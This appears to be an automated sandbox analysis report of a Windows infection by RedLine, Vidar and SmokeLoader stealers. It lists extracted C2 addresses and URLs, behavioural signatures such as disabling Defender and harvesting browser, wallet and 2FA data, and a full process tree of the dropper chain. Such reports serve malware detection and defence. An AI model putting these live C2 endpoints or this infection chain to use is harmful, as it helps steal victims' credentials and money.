Resubmissions

  • 11/07/2024, 05:43 UTC
    240711-gej4lstgrf 10
  • 06/09/2021, 14:13 UTC
    210906-rjpvrsedbm 10
  • 08/07/2021, 11:08 UTC
    210708-4gztl3mwl6 10
  • 08/07/2021, 08:02 UTC
    210708-klfb4qeda6 10
  • 07/07/2021, 09:39 UTC
    210707-nem57xyvf2 10
  • 06/07/2021, 17:51 UTC
    210706-7pcrmjy3fa 10
  • 06/07/2021, 13:45 UTC
    210706-eybelwcq86 10

Analysis

  • max time kernel
    1800s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02/07/2021, 07:13 UTC

General

Malware Config

Extracted

  • Family
    redline
  • Botnet
    ServAni
  • C2
    87.251.71.195:82

Extracted

  • Family
    vidar
  • Version
    39.4
  • Botnet
    706
  • C2
    https://sergeevih43.tumblr.com
  • Attributes
    • profile_id
      706

Extracted

  • Family
    smokeloader
  • Version
    2020
  • C2
    http://ppcspb.com/upload/
    http://mebbing.com/upload/
    http://twcamel.com/upload/
    http://howdycash.com/upload/
    http://lahuertasonora.com/upload/
    http://kpotiques.com/upload/
  • Attributes
    • rc4.i32
      1
      0x3b22e540
    • rc4.i32
      1
      0xa6b397e0

Extracted

  • Family
    vidar
  • Version
    39.4
  • Botnet
    932
  • C2
    https://sergeevih43.tumblr.com
  • Attributes
    • profile_id
      932

Extracted

  • Family
    vidar
  • Version
    39.4
  • Botnet
    865
  • C2
    https://sergeevih43.tumblr.com
  • Attributes
    • profile_id
      865

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 17 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
    PID:1084
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    PID:2752
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    PID:2384
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2360
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    PID:2332
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
    PID:2272
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
    PID:1892
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
    PID:1356
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
    PID:1288
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
    PID:1196
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:932
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:2436
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:4808
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5396
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:4500
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5800
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5172
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5600
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5080
    • C:\Users\Admin\AppData\Roaming\ejvjbva
      C:\Users\Admin\AppData\Roaming\ejvjbva
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5168
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5648
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5352
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5780
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:1608
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:5680
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:4748
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:4832
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:4704
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:1000
    • C:\Users\Admin\AppData\Roaming\ejvjbva
      C:\Users\Admin\AppData\Roaming\ejvjbva
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1516
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      • Executes dropped EXE
      PID:3956
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:5596
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:4484
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:2100
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:5212
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:5872
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:5480
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:2424
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:4384
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:4480
    • C:\Users\Admin\AppData\Roaming\ejvjbva
      C:\Users\Admin\AppData\Roaming\ejvjbva
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5136
    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
      2⤵
      PID:5192
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
    PID:68
  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_1.exe
            arnatic_1.exe
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2620
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 1728
              6⤵
              • Suspicious use of NtCreateProcessExOtherParentProcess
              • Program crash
              PID:4524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_3.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_3.exe
            arnatic_3.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4064
            • C:\Windows\SysWOW64\rUNdlL32.eXe
              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
              6⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_5.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_5.exe
            arnatic_5.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2156
            • C:\Users\Admin\AppData\Roaming\7398983.exe
              "C:\Users\Admin\AppData\Roaming\7398983.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4272
            • C:\Users\Admin\AppData\Roaming\7905267.exe
              "C:\Users\Admin\AppData\Roaming\7905267.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:4440
              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                7⤵
                • Executes dropped EXE
                PID:4564
            • C:\Users\Admin\AppData\Roaming\4460127.exe
              "C:\Users\Admin\AppData\Roaming\4460127.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4780
            • C:\Users\Admin\AppData\Roaming\3466090.exe
              "C:\Users\Admin\AppData\Roaming\3466090.exe"
              6⤵
              • Executes dropped EXE
              PID:5088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3004
          • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_6.exe
            arnatic_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:3476
            • C:\Users\Admin\Documents\eL5kVsaYnZs75tUGGXu5BbeB.exe
              "C:\Users\Admin\Documents\eL5kVsaYnZs75tUGGXu5BbeB.exe"
              6⤵
              • Executes dropped EXE
              PID:4504
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                7⤵
                • Loads dropped DLL
                • Enumerates system info in registry
                • Suspicious use of FindShellTrayWindow
                PID:4608
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff95ef74f50,0x7ff95ef74f60,0x7ff95ef74f70
                  8⤵
                  PID:4624
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1504 /prefetch:2
                  8⤵
                  PID:4788
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1880 /prefetch:8
                  8⤵
                  PID:4964
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:8
                  8⤵
                  PID:4988
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
                  8⤵
                  PID:3696
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
                  8⤵
                  PID:3712
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                  8⤵
                  PID:4388
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                  8⤵
                  PID:4536
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                  8⤵
                  PID:5044
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:1
                  8⤵
                  PID:2892
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
                  8⤵
                  PID:3080
                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                  8⤵
                                                                                    PID:4500
                                                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff720bda890,0x7ff720bda8a0,0x7ff720bda8b0
                                                                                      9⤵
                                                                                        PID:4584
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:8
                                                                                      8⤵
                                                                                        PID:3464
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
                                                                                        8⤵
                                                                                          PID:4812
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
                                                                                          8⤵
                                                                                            PID:4800
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                            8⤵
                                                                                              PID:4808
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3720 /prefetch:8
                                                                                              8⤵
                                                                                                PID:2440
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:4540
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:4544
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3948
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:4032
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:1696
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:4312
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:4828
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:4952
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:732
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1412 /prefetch:1
                                                                                                                  8⤵
                                                                                                                    PID:2452
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:3948
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:3152
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:4584
